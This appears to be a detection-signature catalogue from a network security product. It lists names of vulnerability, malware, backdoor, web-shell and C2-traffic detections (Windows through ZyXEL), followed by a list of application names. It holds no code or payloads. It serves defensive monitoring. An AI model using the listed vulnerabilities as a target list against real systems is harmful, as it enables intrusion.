Windows-URL-Zone-Check-Bypass-CVE-2023-35384
Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544
Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625
Windows-Visual-Studio-Code-Git-Extension-Argument-Injection
Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution
Windows-Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability
Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability
Windows_Xp_2003_Land_Attack_DoS
WinFTP-Nlst-Denial-of-Service
Winhopstealer-Trojan
WinNuke-DoS
Winos4.0-Post-Exploitation-Framework-C2-Traffic
WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow
WINS-Buffer-Overflow-2-MS09-039
WINS-Buffer-Overflow-MS09-039
WINS-Computer-Name-Validation-Buffer-Overflow
WINS-Replication-Packet-System-Comromise
Wintr-Web-Project-SQL-Injection
WinVNC-Web-Server-Buffer-Overflow
Winwebsec-Botnet
WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
WinZip-UUDeview-Mime-Archive-Buffer-Overrun
Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow
Wireshark-Capwap-Dissector-Denial-Of-Service
Wireshark-CLDAP-Dissector-DOS
Wireshark-Insecure-Search-Path-Script-Execution
Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow
Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
Wireshark-SigComp-Buffer-Overflow-Vulnerability
WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
WMF-Windows-Metafile-Vulnerability-MS05-053
Wnad
Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow
Word-RTF-Listoverridecount-RCE-CVE-2012-2539
Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting
Wordpress-10Web-Photo-Gallery-SQL-Injection
Wordpress-Admin-API-Directory-Traversal
Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-XSS
Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE
Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal
Wordpress-Arbitrary-File-Deletion
Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956
Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS
Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection
Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
Wordpress-Backuply-Plugin-Options-SQL-Injection
Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS
Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
Wordpress-BookingPress-SQLi
Wordpress-BulletProof-Security-Backup-Disclosure
Wordpress-C-Library-Gethostbyname-Buffer-Overflow
Wordpress-Calculated-Fields-Form-Cross-Site-Scripting
Wordpress-Comment-Content-Filter-Remote-Code-Execution
Wordpress-Comments-Stored-Cross-Site-Scripting
Wordpress-Compfight-1.4-Cross-Site-Scripting
Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting
Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting
Wordpress-Core-External-Entity-Injection
Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting
Wordpress-Database-Backup-RCE
Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting
Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS
Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload
Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting
Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE
Wordpress-DukaPress-Plugin-Directory-Traversal
Wordpress-EasyCart-Plugin-Privilege-Escalation
Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner
Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass
Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection
Wordpress-File-Manager-Advanced-Shortcode-RCE
Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213
Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting
Wordpress-Forminator-Plugin-SQL-Injection
Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting
Wordpress-Google-Maps-Plugin-SQL-Injection
Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting
Wordpress-Hash-Form-Plugin-RCE
Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload
Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661
Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection
Wordpress-InfiniteWP-Client-Authentication-Bypass
Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload
Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload
Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-Cross-Site-Scripting
Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection
Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting
Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879
Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting
Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522
Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting
Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000
Wordpress-Long-Password-DoS
Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution
Wordpress-MasterStudy-Admin-Account-Creation
Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting
Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting
Wordpress-Modern-Events-Calendar-SQLi-Scanner
Wordpress-Multiple-File-Load-DoS-CVE-2018-6389
Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection
Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution
Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi
Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload
Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS
Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection
Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection
Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762
Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection
Wordpress-Photo-Gallery-Plugin-SQL-Injection
Wordpress-Photo-Gallery-Unrestricted-File-Upload
Wordpress-PHPMailer-Host-Header-Command-Injection
Wordpress-Plainview-Activity-Monitor-RCE
Wordpress-Plugin-Backup-Guard-Authenticated-RCE
Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation
Wordpress-Plugin-Catch-Themes-Demo-Import-RCE
Wordpress-Plugin-Duplicator-Arbitrary-File-Read
Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution
Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344
Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE
Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE
Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969
Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE
Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation
Wordpress-Popular-Posts-Authenticated-RCE
Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting
Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498
Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924
Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi
Wordpress-Rest-API-Posts-Controller-Privilege-Escalation
Wordpress-RevSlider-Vulnerability
Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting
Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi
Wordpress-SEO-Plugin-Url-SQL-Injection
Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting
Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826
Wordpress-Simple-File-List-Plugin-Path-Traversal
Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE
Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion
Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection
Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting
Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection
Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection
Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload
Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection
Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection
Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting
Wordpress-W3-Total-Cache-PHP-Code-Execution
Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063
Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution
Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013
Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability
Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370
Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection
Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection
Wordpress-WP-Time-Capsule-Arbitrary-File-Upload
Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload
Wordpress-wpDiscuz-Unauthenticated-File-Upload
Wordpress-WPS-Hide-Login-Login-Page-Revealer
Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal
Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization
Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal
Worldweaver-DX-Studio-Player-Command-Execution
Worm-Autorun-Aaeb-H
Worm-Nimda
WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003
WPEverest-WordPess-Plugin-Arbitrary-File-Upload
WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249
WS-FTP-Server-Multiple-Commands-BOF
WSHRAT-Malware-Infection-Traffic
WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting
WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074
WSO2-Unrestricted-File-Upload-CVE-2022-29464
WU-FTPD-Fnmatch-Function-Asterisk-DoS
WU-FTPD-Realpath-Off-By-One-BOF
WU-FTPD-Site-Exec-Format-String-Vulnerability
WU-IMAP-POP-Login-Buffer-Overflow
Wwbn-Avideo-Chunkfile-Command-Injection
Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting
Wwbn-Avideo-Wget-Downloadurl-Command-Injection
WzdFTPD-Site-Command-Remote-Command-Execution
XAR-Archive-File-Transfer
xArrow-SCADA-HMI-DoS-Ver1
xArrow-SCADA-HMI-DoS-Ver2
xArrow-Webserver-DoS
Xarvester-Spambot
XCSSET-Malware-Traffic
Xdmcp-Double-Free
Xen-Project-Xapi-Update-Directory-Traversal
Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection
XFSP_X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow
Xitami-HTTP-Server-Msdos-Device-Name-DoS
XLink-FTP-Server-Buffer-Overflow
XLink-Omni-NFS-Server-Buffer-Overflow
XM-Easy-Personal-FTP-Server-Nlst-DoS
Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution
XMLDsig-Hmac-Truncation-Authentication-Bypass
XMRig_CPU_Miner_Binary_File
Xnview-PCT-File-Processing-Buffer-Overflow
Xpdf-Splash-Drawimage-Integer-Overflow
XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
XpoLog-Center-Remote-Command-Execution
Xstream-Library-CVE-2020-26217-Insecure-Deserialization
Xstream-Library-CVE-2020-26258-Insecure-Deserialization
Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion
Xstream-Library-Insecure-Deserialization
Xstream-Library-Reflectionconverter-Insecure-Deserialization
Xstream-Unsafe-Deserialization
Xstream-Unsafe-Deserialization-CVE-2021-29505
XTACACSD-Buffer-Overflow
Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
Xunlei-Thunder-Usage
Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
Xupiter-Toolbar
Xwiki-Attachmentselector-Docname-Code-Injection
Xwiki-Deleteattachment-Stored-Cross-Site-Scripting
Xwiki-Filename-Stored-Cross-Site-Scripting
Xwiki-Legacynotificationadministration-Since-Code-Injection
Xwiki-Mentionsmacro.XML-Code-Injection
Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection
Xwiki-Searchsuggestsourcesheet-Code-Injection
Xwiki-Solrsearchmacros-Text-Code-Injection
Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection
Xwiki-Upload-Reflected-Cross-Site-Scripting
Xwiki-Xwikiserverclasssheet-Code-Injection
Xwiki.org-Change-Request-Extension-Code-Injection
Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection
Xwiki.org-Xwiki-Databasesearch-Code-Injection
Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting
Xwiki.org-Xwiki-Invitationguestactions-Code-Injection
Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting
Xwiki.org-Xwiki-Notificationrssservice-Code-Injection
Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution
Xwiki.org-Xwiki-Registrationconfig-Code-Injection
Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection
Xwiki.org-Xwiki-Searchadmin-Code-Injection
Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection
Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection
Xwiki.org-Xwiki-Tags-Code-Injection
Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection
Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection
Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting
Xymon-Daemon-Gather-Information
Xymon-Useradm-Command-Execution
YaBB-Cgi-Information-Retrieval
Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download
Yahoo!-Messenger-File-Transfer-Filename-Spoofing
Yahoo!-Messenger-Webcam-Upload-ActiveX-Control-Stack-Buffer-Overflow
Yahoo!-Messenger-Webcam-Viewer-ActiveX-Control-Stack-Buffer-Overflow
Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows
Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow
Yahoo-Instant-Messenger-Network-Usage
Yahoo-Messenger-ActiveX-Control-Command-Execution
Yahoo-WebMessenger-Usage
Yaws-Web-Server-Directory-Traversal
Yealink-Device-Management-Command-Injection-CVE-2021-27561
Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow
Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow
Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow
Yokogawa-CENTUM-Denial-Of-Service
Yokogawa-CS3000-Buffer-Overflow
YoungZSoft-CCProxy-Connect-Buffer-Overflow
YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow
YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow
YouPHPTube-Checkconfiguration.php-Remote-Code-Execution
YouPHPTube-Encoder-Getimage.php-Command-Injection
YouPHPTube-Encoder-Getimagemp4.php-Command-Injection
YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection
YouPHPTube-SQL-Injection-Vulnerability
Your-Freedom-Network-Usage
YouTube
YPOPS-Buffer-Overflow
Ysoserial-Generated-DotNet-Serialized-Object
Ysoserial-Generated-Java-Serialized-Object
Z-Scada-Net2.0-0-Day
Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327
Zabbix-Agent-Command-Injection
Zabbix-Arbitrary-Command-Execution
Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120
Zabbix-Authenticated-Remote-Command-Execution
Zabbix-Geomap-Stored-Cross-Site-Scripting
Zabbix-Server-Active-Proxy-Trapper-Command-Injection
Zabbix-Server-Active-Proxy-Trapper-Command-Injection-Bypass-CVE-2020-11800
Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read
Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134
Zabbix-SQL-Injection
Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131
Zelune-Anonymous-Proxy-Portal
Zen-Cart-Ajax.php-Remote-Code-Execution
Zend-Technologies-Zend-Framework-Zend_XmlRpc-Information-Disclosure
Zend-Zend-Server-Java-Bridge-Remote-Code-Execution
Zenoss-Core-Version-Check-Remote-Code-Execution
ZenTao-Pro-Remote-Code-Execution
Zenturi-ProgramChecker-sasatl-ActiveX-Control-DebugMsgLog-Method
Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-Buffer-Overflow
Zeppelin-Ransomware-Infection-Traffic
ZeroAccess-Botnet
Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow
Zeromq-Libzmq-V2_Decoder-Integer-Overflow
ZeroShell-Command-Injection-CVE-2019-12725
ZeroShell-Local-File-Disclosure
Zeus-Web-Server-File-Read-Vulnerability
Zeus-Zbot-Botnet
ZGrab-Network-Scanner
Zimbra-Collaboration-Autodiscover-Servlet-Xxe
Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting
Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection
Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
Zimbra-Collaboration-Command-Injection-CVE-2024-45519
Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926
Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192
Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting
Zimbra-Collaboration-Mailboxd-External-Entity-Vulnerability
Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925
Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924
Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518
Zimbra-Collaboration-Server-Local-File-Inclusion
Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882
Zip-Archive
Zivif-Camera-iptest.cgi-Blind-RCE
ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537
Zlib-Denial-Of-Service-CVE-2004-0797
Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow
Zlip-DNS-Violations
Zloader-Malware-C2-Traffic
Zml-Cgi-Directory-Traversal
Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084
Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847
Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection
Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection
Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload
Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload
Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload
Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload
Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection
Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload
Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS
Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection
Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection
Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection
Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection
Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection
Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS
Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting
Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection
Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection
Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection
Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting
Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection
Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection
Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection
Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload
Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection
Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection
Zoho-Manageengine-Applications-Manager-Userconfigurationaction-XSS
Zoho-Manageengine-AppManager-Masrequestprocessor-SQL-Injection
Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass
Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal
Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write
Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion
Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515
Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization
Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection
Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection
Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Zoho-Manageengine-Multiple-Products-Importtechniciansaction-File-Upload
Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection
Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection
Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection
Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection
Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection
Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection
Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection
Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload
Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe
Zoho-Manageengine-Opmanager-Cachestart-Directory-Traversal
Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection
Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization
Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting
Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal
Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection
Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection
Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization
Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection
Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection
Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection
Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection
Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass
Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection
Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection
Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization
Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection
Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection
Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection
Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection
Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection
Zoho-Manageengine-PWMgrPro-Usergrouplisttablecontroller-SQL-Injection
Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection
Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405
Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966
Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution
Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass
Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting
Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting
Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394
Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-XSS
Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS
Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection
ZoneMinder-Language-Settings-Remote-Code-Execution
ZoneMinder-Snapshots-Command-Injection
ZoneMinder-Video-Server-Command-Execution
ZooKeeper-Exhibitor-UI-Command-Injection
Zoom-Linux-Client-Command-Injection-CVE-2017-15049
Zope-XMLTools-Plone-Remote-Command-Execution
ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321
ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm
ZyXEL-Command-Injection-CVE-2023-28771
ZyXEL-NAS-Backdoor-Account-CVE-2024-29972
ZyXEL-NAS-Command-Injection-CVE-2023-27992
ZyXEL-NAS-Command-Injection-CVE-2024-29973
ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974
ZyXEL-Parse_config.py-Command-Injection
ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976
ZyXEL-Remote-Code-Execution-CVE-2020-9054
ZyXEL-Remote-Code-Execution-CVE-2022-30525
ZyXEL-Unauthenticated-Lan-Remote-Code-Execution
ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890
ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891
ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass

Situations by name

000FreeProxy
10000ft
100Bao
101-Voice
101domain
101domains
1099-Software
123-reg
123contactform
123Together
126-Mail
13D-Research
15five
1984.is
1and1
1CRM
1fichier
1internet.tv
1Password
1st-Domains
1time
1und1-Mail
23andMe
247-inc
24online
24Seven-Cart
24sevenoffice
24x7-Sserver-Management
2channel
2Checkout
2dplay
2imagine-web2print
33across
36-Dollar-360
360-Degree-Feedback-Tool
360-Degree-IT
360-Enterprise-Suite
360-Safeguard
360-Yunpan
360Alumni
360cloudsolutions
360Contest
3CLogic
3D-Systems
3dcart
3DEXCITE
3i-infotech
3jam
3manager
3P-Works
3Play-Media
3plcentral
3pmobile
3scale
40Nuggets
42Goals
43-Things
451-Research
4chan
4filehosting
4imprint
4projects
4remotesupport
4Shared
4sync
4tube
500px
51
51.com
51.com-Bulletin-Board
51.com-Mail
51.com-Posting
51.com-Web-Disk
5pm
71lbs
7Geese
7Segments
7shifts
80legs
81dash
88flow
8am
8Card
8tracks
8x8
99designs
99tests
9cast.net
9GAG
9Lenses
a-la-mode
A-Systems-JobView
a.k.a.
A2-Hosting
A2000-Software
A2Z-Manager
A2zapps
A3-Modeling
A7Pro
aACE-Business-Suite
Aamulehti
Aardvark
Aarki
AARP
AARP-Provider-Online-Tool
Aavaz
Aaztec-Signage-Suite
AB-Tasty
Ababil
Abacus
Abak-Time-and-Billing
AbanteCart
ABB
Abebooks
ABECAS-Insight-Cost-Accounting
ABELDent
AbiClould
Abila
ABIS-Pro
AbleCommerce
Abledoc
AbleTrend
Abortion
About-Me
Abraxas
Abraxsys
Absolute-Manage
Absolute-Return-Capital
AbsoluteBackground
absoluteBUSY
Absorb-LMS
Abstract blacklisting request
Abused Drugs
Academic-Earth
Academy10
Acadre
Acapela-Group
ACAtrac
Acaveo
Accalio-ECM
AccelerationATS
Accellion
Accellos
Accelo
Accelops
Accelrys
AccentiaTechnologies
Accenture-CAS
Acceo
Accept360
Acceptiva-for-Nonprofits
Acceptum-Business-Software
Access-Freightliner
AccessGroup
AccessPatrol
Acclaris
Accommodations-Plus-International
Accompa
Accountable
Accountants-Office
AccountEdge
Accounting-ASAP
AccountMate
AccounTrex
AccountSight
AccountsIQ
AccountsPortal
Accruent
Acct1st-DMS
AccuBuild
AccuConference
Acculynx
Accumulus-Subscription-and-Usage-Billing
